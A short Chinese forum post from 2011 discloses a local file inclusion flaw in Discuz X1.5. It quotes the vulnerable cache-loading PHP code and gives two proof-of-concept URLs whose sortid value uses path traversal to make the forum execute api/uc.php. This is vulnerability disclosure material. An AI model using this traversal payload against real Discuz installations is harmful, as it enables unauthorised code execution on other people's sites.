四宝之尊 發表於 2011-3-11 11:44:47

DISCUZ X1.5 本地文件包含漏洞说明

config_global.php <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode1"> <br />  $_config['cache']['type'] = &lsquo;file&rsquo;; <br />  function cachedata($cachenames) { <br />  &hellip;&hellip; <br />  $isfilecache = getglobal(&lsquo;config/cache/type&rsquo;) == &lsquo;file&rsquo;; <br />  &hellip;&hellip; <br />  if($isfilecache) { <br />  $lostcaches = array(); <br />  foreach($cachenames as $cachename) { <br />  if(!@include_once(DISCUZ_ROOT.&rsquo;./data/cache/cache_&rsquo;.$cachename.&rsquo;.php&rsquo;)) { <br />  $lostcaches[] = $cachename; <br />  } <br />  } <br />  &hellip;&hellip; <br />  } <br /></div><br />  地址: <br />  http://localhost:8080/bbs/forum.php?mod=post&amp;action=threadsorts&amp;sortid=ygjgj/../../../api/uc <br />  http://localhost:8080/bbs/forum.php?mod=post&amp;action=threadsorts&amp;sortid=ygjgj/../../../api/ucAuthracation has expiried <br />  执行了 api/uc.php 页面代码了。 <br />  作者: Jannock
頁: [1]
查看完整版本: DISCUZ X1.5 本地文件包含漏洞说明